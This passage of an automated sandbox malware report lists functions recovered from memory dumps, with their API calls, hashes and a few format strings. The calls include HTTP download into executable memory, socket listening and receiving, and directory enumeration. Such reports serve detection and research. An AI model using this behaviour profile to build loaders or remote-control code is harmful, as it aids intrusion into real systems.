Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _malloc$__snprintf$_memsethtonl$AllocateExitHeapSleepThread_realloc
String ID:
API String ID: 281750196-0
Opcode ID: 330d6016b79b0f92bd64455683f04f9a9efce58d84c1e89934c403e479161cc1
Instruction ID: 5aea7b2e81e9af080901131b3b97d4d2d54b9e52868f22e6d75cec5cf87f80bb
Opcode Fuzzy Hash: 330d6016b79b0f92bd64455683f04f9a9efce58d84c1e89934c403e479161cc1
Instruction Fuzzy Hash: 19812771A043006AE6D0BB379C0DA2FBAE9AFC1710F148929FF74D6191EF71C541CA62

Uniqueness

Uniqueness Score: -1.00%

Function 067692E4 Relevance: 7.6, APIs: 5, Instructions: 63
filememoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,00000000,0000001C), ref: 0676931B
HeapDestroy.KERNEL32(?), ref: 06769343
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0676935A
VirtualFree.KERNEL32(?,00000000,00008000), ref: 06769365
UnmapViewOfFile.KERNEL32(?), ref: 06769373

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Virtual$Free$DestroyFileHeapQueryUnmapView
String ID:
API String ID: 4268163748-0
Opcode ID: d88d968123e4ad76a361f99e90759fb026cd53607766523a215647476aa05846
Instruction ID: 56dd9a5355cb4da37182a7d5e12babefb6d493946f6e7c924ae491aed87bc698
Opcode Fuzzy Hash: d88d968123e4ad76a361f99e90759fb026cd53607766523a215647476aa05846
Instruction Fuzzy Hash: 67118C31D5021AEEDBA09F37DC09EBE7768AB42721F548125FE0AEA180C774DD81CA95

Uniqueness

Uniqueness Score: -1.00%

Function 05F300CE Relevance: 6.1, APIs: 4, Instructions: 75
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,05F30143,00000000,00000000,00000000,84400200,00000000,?,696E6977,0074656E), ref: 05F300E2
InternetErrorDlg.WININET(0BE057B7,00000000,00000000,?,00000007,00000000,?,696E6977,0074656E), ref: 05F30127
VirtualAlloc.KERNEL32(E553A458,00000000,00400000,00001000,00000040,?,696E6977,0074656E), ref: 05F302DC
InternetReadFile.WININET(E2899612,00000000,05F300F3,00002000,?,05F300F3,?,?,696E6977,0074656E), ref: 05F302F7

Memory Dump Source

Source File: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f30000_2.jbxd

Yara matches

Similarity

API ID: Internet$AllocErrorFileHttpOpenReadRequestVirtual
String ID:
API String ID: 825455464-0
Opcode ID: c825f18c99f9df7cf564f541a7d8b5394c2efc7e3cb1da508c9495459e7d8d3c
Instruction ID: ed07a46cf664fd974408ceeb4730905c53d4b3abd39399e16c7ba0eaffc6c331
Opcode Fuzzy Hash: c825f18c99f9df7cf564f541a7d8b5394c2efc7e3cb1da508c9495459e7d8d3c
Instruction Fuzzy Hash: B601F1A1A892493AF73411678C9FF3B699EEBC1BE4F264129B109922C0EC94EC008038

Uniqueness

Uniqueness Score: -1.00%

Function 06762BF0 Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 06762B61: WSAStartup.WS2_32(00000202,?), ref: 06762B7F
Part of subcall function 06762B61: WSACleanup.WS2_32 ref: 06762B89

WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 06762C10
WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 06762C3B
closesocket.WS2_32(00000000), ref: 06762C7A

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CleanupIoctlSocketStartupclosesocket
String ID:
API String ID: 1100289767-0
Opcode ID: 9f3033e3f4a22a075410ae67d0e3c15ac1cc5bb6ac2a8980b0b26eb1c699f98e
Instruction ID: 5ebaec703cde41b7797701041128b9fecc533da9baab53b48e3bc553f67d0fb4
Opcode Fuzzy Hash: 9f3033e3f4a22a075410ae67d0e3c15ac1cc5bb6ac2a8980b0b26eb1c699f98e
Instruction Fuzzy Hash: AA110A31A41118AFD7A0DA669C48FFB7E6DDB81360F108121FE26D3182D634CA408A60

Uniqueness

Uniqueness Score: -1.00%

Function 06766F4C Relevance: 4.5, APIs: 3, Instructions: 35
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 06766F52

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

_malloc.LIBCMT ref: 06766F62
_memset.LIBCMT ref: 06766F7F

Part of subcall function 067757F0: __lock.LIBCMT ref: 0677580E
Part of subcall function 067757F0: ___sbh_find_block.LIBCMT ref: 06775819
Part of subcall function 067757F0: ___sbh_free_block.LIBCMT ref: 06775828
Part of subcall function 067757F0: HeapFree.KERNEL32(00000000,00000000,067905E8,0000000C,0677A726,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C), ref: 06775858
Part of subcall function 067757F0: GetLastError.KERNEL32(?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE,00000000,00000000,?,0677A7E0,0000000D), ref: 06775869

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Heap_malloc$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock_memset
String ID:
API String ID: 1561657895-0
Opcode ID: d45916bbc5c499c68ca7f5d18931805b9e7e2064ea88ca9b278179744f639e63
Instruction ID: 2bdc3325c02a2f6d99a956c17bd5db50aa338a91a4a40014d10e6573e6e48054
Opcode Fuzzy Hash: d45916bbc5c499c68ca7f5d18931805b9e7e2064ea88ca9b278179744f639e63
Instruction Fuzzy Hash: EEE09B3750531537DEE137A6DC04FEF2E198F825B0F504425FF1C99140EE11990156E6

Uniqueness

Uniqueness Score: -1.00%

Function 008F2D34 Relevance: 3.6, APIs: 2, Instructions: 610
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,?,0000003A), ref: 008F2D00
CreateThread.KERNEL32(00000000,00000000,?,?,?,0000003A), ref: 008F31C1

Memory Dump Source

Source File: 00000000.00000002.4124331646.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f0000_2.jbxd

Similarity

API ID: AllocCreateThreadVirtual
String ID:
API String ID: 3065189322-0
Opcode ID: 9f359b3337f2ed4c4fcc16858b3de70f966b86df0659a9747d7feadd23237203
Instruction ID: 50d046826047009a34abf17384b95f6f6fce33520f5012eed76828c0e975f3b0
Opcode Fuzzy Hash: 9f359b3337f2ed4c4fcc16858b3de70f966b86df0659a9747d7feadd23237203
Instruction Fuzzy Hash: DB413BB58043889FCB11DFA9D844ADEBFF0FF4A314F14849AE598A7262C374A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05F3016B Relevance: 3.1, APIs: 2, Instructions: 106
memoryfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(E553A458,00000000,00400000,00001000,00000040,?,696E6977,0074656E), ref: 05F302DC
InternetReadFile.WININET(E2899612,00000000,05F300F3,00002000,?,05F300F3,?,?,696E6977,0074656E), ref: 05F302F7

Memory Dump Source

Source File: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f30000_2.jbxd

Yara matches

Similarity

API ID: AllocFileInternetReadVirtual
String ID:
API String ID: 3591508208-0
Opcode ID: c859c9ea8ce8c1b03b03364390e8741223bb4b5b15c8a4ff72f26d9785638e68
Instruction ID: c25e1ae5350b5617869332b1de07baf41df6fe5472fc5378f144d4070f362e1b
Opcode Fuzzy Hash: c859c9ea8ce8c1b03b03364390e8741223bb4b5b15c8a4ff72f26d9785638e68
Instruction Fuzzy Hash: 15219B6661D3E076FB26C7398D9BB563F8CBB57254B1C009DE082861C3D984E910C39E

Uniqueness

Uniqueness Score: -1.00%

Function 05F30229 Relevance: 3.1, APIs: 2, Instructions: 80
memoryfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(E553A458,00000000,00400000,00001000,00000040,?,696E6977,0074656E), ref: 05F302DC
InternetReadFile.WININET(E2899612,00000000,05F300F3,00002000,?,05F300F3,?,?,696E6977,0074656E), ref: 05F302F7

Memory Dump Source

Source File: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f30000_2.jbxd

Yara matches

Similarity

API ID: AllocFileInternetReadVirtual
String ID:
API String ID: 3591508208-0
Opcode ID: 7723b0759af88c33b5c5af931803441c3542aa83bb23e5fcfbb9293d481e0aff
Instruction ID: d0271fedf70c2895b832749aab18bc7a0b58b7b84ea11e2ce33dbdd22057f8a3
Opcode Fuzzy Hash: 7723b0759af88c33b5c5af931803441c3542aa83bb23e5fcfbb9293d481e0aff
Instruction Fuzzy Hash: 5C11E2215006495EFB114F768C8AFA5BB9DEFC5740B24046EF0909B295DF45D841C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 06767C45 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 067677BE: htonl.WS2_32(?), ref: 067677F8
Part of subcall function 067677BE: select.WS2_32(00000000,?,?,?,?), ref: 0676785C
Part of subcall function 067677BE: __WSAFDIsSet.WS2_32(00000000,?), ref: 06767878
Part of subcall function 067677BE: accept.WS2_32(00000000,00000000,00000000), ref: 0676788D
Part of subcall function 067677BE: ioctlsocket.WS2_32(00000000,8004667E,?), ref: 067678A0

GetTickCount.KERNEL32 ref: 06767C53

Part of subcall function 06767AF5: _malloc.LIBCMT ref: 06767B19
Part of subcall function 06767AF5: htonl.WS2_32(?), ref: 06767B45
Part of subcall function 06767AF5: recvfrom.WS2_32(00000000,?,000FFFFC,00000000,000000FF,?), ref: 06767B74
Part of subcall function 06767AF5: WSAGetLastError.WS2_32 ref: 06767B7F

GetTickCount.KERNEL32 ref: 06767C66

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CountTickhtonl$ErrorLast_mallocacceptioctlsocketrecvfromselect
String ID:
API String ID: 597769433-0
Opcode ID: 7ad487bf7262ac2757a20279f2ee8d917b351c20265d4b0bcc6f235d946e5fe7
Instruction ID: 152277ae5f80d2f22f9649a37eb7cd6e968c3b353aa6bd3af22e8b1e37e6f1b4
Opcode Fuzzy Hash: 7ad487bf7262ac2757a20279f2ee8d917b351c20265d4b0bcc6f235d946e5fe7
Instruction Fuzzy Hash: 43D0A902A0002801E5E833BF9C8806E068A8A890F8B794637FE21D2300DE98A88243B2

Uniqueness

Uniqueness Score: -1.00%

Function 0676DEDE Relevance: 1.8, APIs: 1, Instructions: 257COMMONLIBRARYCODE

Download Yara Rule

APIs

_calloc.LIBCMT ref: 0676DF40

Part of subcall function 06783A30: __calloc_impl.LIBCMT ref: 06783A45

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __calloc_impl_calloc
String ID:
API String ID: 2108883976-0
Opcode ID: 87cddaf005841637bcb258b6f44450a7738aecf003616dc52397102700e0f0b2
Instruction ID: 3235966c5a4a9859746cccd58511a02e4b99bf62545560a4e2c2fb509fd5bcfd
Opcode Fuzzy Hash: 87cddaf005841637bcb258b6f44450a7738aecf003616dc52397102700e0f0b2
Instruction Fuzzy Hash: AEA138B5D14208EFEF618F95CC45EAEBBB6FF89300F208159FA01AA250D7725A41DF61

Uniqueness

Uniqueness Score: -1.00%

Function 008F21B0 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,?,?,?,0000003A), ref: 008F31C1

Memory Dump Source

Source File: 00000000.00000002.4124331646.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f0000_2.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: eb1222837d4f9c262e47492f99ec59875cb83eaa7c06002ac8c1ae5dce41c409
Instruction ID: 20232c88051a47b58741b22e330f66171f7975ee4b72b2f039983949466bc479
Opcode Fuzzy Hash: eb1222837d4f9c262e47492f99ec59875cb83eaa7c06002ac8c1ae5dce41c409
Instruction Fuzzy Hash: 712106B590024DDFCB10CF9AD844ADEBBF4FB48314F108429E959A7250C375AA54CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 067710FF Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 06771106

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 648c9d9574391eb33ea0a8c0d24a0566c541bee802ecf9e617acf4e564981961
Instruction ID: 639a6f241b62aa9aa5fd761c299fede4ca22a9002bbca86923978f4c1130f2a8
Opcode Fuzzy Hash: 648c9d9574391eb33ea0a8c0d24a0566c541bee802ecf9e617acf4e564981961
Instruction Fuzzy Hash: 3DE04F722187014FEBA88F2CFC45A16B7E1AB95630B24CE3ED0AAC7384D634D0818B04

Uniqueness

Uniqueness Score: -1.00%

Function 067774C3 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,?,067771FF,00000001,?,?,?,06777378,?,?,?,06790728,0000000C,06777433), ref: 067774D8

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 792fbb127d80d8f5fe67a9218de8c63503b37f8ee97a5f1d28a0c853e66bb51b
Instruction ID: 109d3a9058cf8838160a5f6a5f99a1bebce22405222912deb179cf2995def80a
Opcode Fuzzy Hash: 792fbb127d80d8f5fe67a9218de8c63503b37f8ee97a5f1d28a0c853e66bb51b
Instruction Fuzzy Hash: 7BD05E329A03096EEB10AE707C097323BDD9784395F14C439BA1CC6180FAB4C9419511

Uniqueness

Uniqueness Score: -1.00%

Function 0636933E Relevance: 1.3, APIs: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,063688B6,?,063688B6,AAAABBBB), ref: 0636942D

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
Instruction ID: fbf6714a729c3ffa204f4d4438d02dac09a170e33d1393be56845f38de21d299
Opcode Fuzzy Hash: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
Instruction Fuzzy Hash: 0D31BD70A0010AAFDB48CF99C894BAEB7B5FF88314F10C199F519AB394D770AA55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 008F21A4 Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,?,0000003A), ref: 008F2D00

Memory Dump Source

Source File: 00000000.00000002.4124331646.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f0000_2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0f64d82d76465edaac2f05d00b80f833fdbf8e744bda1283bcede6b2df6b63ca
Instruction ID: 099f86a3d41e96abf51a1d8586d28b701b214e771b1276a780f9131c64e7a8c4
Opcode Fuzzy Hash: 0f64d82d76465edaac2f05d00b80f833fdbf8e744bda1283bcede6b2df6b63ca
Instruction Fuzzy Hash: 0D1102B59002499FCB20DF9AD448BDEBFF4FB48324F208469E658A7250C375A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 008F2C90 Relevance: 1.3, APIs: 1, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,?,0000003A), ref: 008F2D00

Memory Dump Source

Source File: 00000000.00000002.4124331646.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f0000_2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a60621cb5964310fcd18cea1693c1ff0eed6a9464eb3062e6972c42b3ba34409
Instruction ID: 668182f7ed5958c44a86bcb0c50566717535e52237c9bc90957e97423c9475e5
Opcode Fuzzy Hash: a60621cb5964310fcd18cea1693c1ff0eed6a9464eb3062e6972c42b3ba34409
Instruction Fuzzy Hash: 811102B5800249DFCB20DF9AD485BDEBFF4FB48324F208469E958A7250C375A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06764A3E Relevance: 1.3, APIs: 1, Instructions: 31sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Sleep.KERNEL32(?,0000EA60,?,0676165F,0000EA60), ref: 06764A99

Part of subcall function 06764AB7: htonl.WS2_32(0678E534), ref: 06764ADA

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Sleephtonl
String ID:
API String ID: 4038527953-0
Opcode ID: 63ae7adcb3d156f72b3f744712d1ca1ab57e043fc44c7a1ee18b5953a74a2738
Instruction ID: e4fc17f7d8b93b0d1f7e4abc5cba0a5545ae477d98d44b41eb79251fc3569736
Opcode Fuzzy Hash: 63ae7adcb3d156f72b3f744712d1ca1ab57e043fc44c7a1ee18b5953a74a2738
Instruction Fuzzy Hash: 27F08231911309BFDB94AB66EC09B2D37E6EB04320F10C039FF04C1244EB75C852CA6A

Uniqueness

Uniqueness Score: -1.00%

Function 0085D4E0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4124161560.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85d000_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e4f4639827ae6b4c8810becadee6d57bced62a54833a71cb8390e338177f453
Instruction ID: ae31672ff299b13e94c804c7d9e200081aba6c4a7535a986f20fb5ff93ec7914
Opcode Fuzzy Hash: 5e4f4639827ae6b4c8810becadee6d57bced62a54833a71cb8390e338177f453
Instruction Fuzzy Hash: 02214272500304DFDB20DF04D9C0B27BFA5FB98319F20C169EC0A8B256D336D84ACAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0085D4DB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4124161560.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85d000_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: d7094dbf369b77269ad2beb3b549df5900c457048f035ee8ac34c83c37ffe43f
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: EB119D76504340CFDB16CF10D5C4B16BF62FB98314F24C5A9DD094A256C336D85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0085D781 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4124161560.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85d000_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3e12d7759fbd9eeb3a7666ac730453f22339887c5e610785e0e4ec3a03c83a1
Instruction ID: b804c17b63cfd994ce952435a6113728ba3eb30537b51eab43343f8aa2b38473
Opcode Fuzzy Hash: e3e12d7759fbd9eeb3a7666ac730453f22339887c5e610785e0e4ec3a03c83a1
Instruction Fuzzy Hash: 4201D6311093449EE7309A29CD84767FF98FF49725F28C46AED098A296C679DC48CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0085D780 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4124161560.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85d000_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0edc1e67609f1e4b9d12dd6265c87dc23de53755a7ba9c050f5a163bba4ec40a
Instruction ID: c7a6f064e443abff95852938a62fa9f9c57d34e4475e6755ce864b17afb1330f
Opcode Fuzzy Hash: 0edc1e67609f1e4b9d12dd6265c87dc23de53755a7ba9c050f5a163bba4ec40a
Instruction Fuzzy Hash: 87F06271409344AEE7208A2AD984B66FFA8FB55735F18C45AED084F286C2799C44CA71

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 067647C9 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 172filetimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 067647DB

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

_memset.LIBCMT ref: 067647E7

Part of subcall function 06761683: _malloc.LIBCMT ref: 06761689

Part of subcall function 067616D3: htonl.WS2_32(0000001F), ref: 067616D9

_strncmp.LIBCMT ref: 06764836
GetCurrentDirectoryA.KERNEL32(00004000,00000000), ref: 06764844

Part of subcall function 067757F0: __lock.LIBCMT ref: 0677580E
Part of subcall function 067757F0: ___sbh_find_block.LIBCMT ref: 06775819
Part of subcall function 067757F0: ___sbh_free_block.LIBCMT ref: 06775828
Part of subcall function 067757F0: HeapFree.KERNEL32(00000000,00000000,067905E8,0000000C,0677A726,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C), ref: 06775858
Part of subcall function 067757F0: GetLastError.KERNEL32(?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE,00000000,00000000,?,0677A7E0,0000000D), ref: 06775869

FindFirstFileA.KERNEL32(00000000,?), ref: 06764875
GetLastError.KERNEL32 ref: 06764882
FileTimeToSystemTime.KERNEL32(?,00000000), ref: 067648CE
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,00000000,?), ref: 067648DE
FindNextFileA.KERNEL32(00000000,00000010), ref: 06764971
FindClose.KERNEL32(00000000), ref: 06764980

Part of subcall function 06761726: _vwprintf.LIBCMT ref: 06761730
Part of subcall function 06761726: _vswprintf_s.LIBCMT ref: 06761754

Strings

F%I64d%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 0676495B
D0%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 06764915
%s, xrefs: 0676485F
.\*, xrefs: 06764830

Memory Dump Source

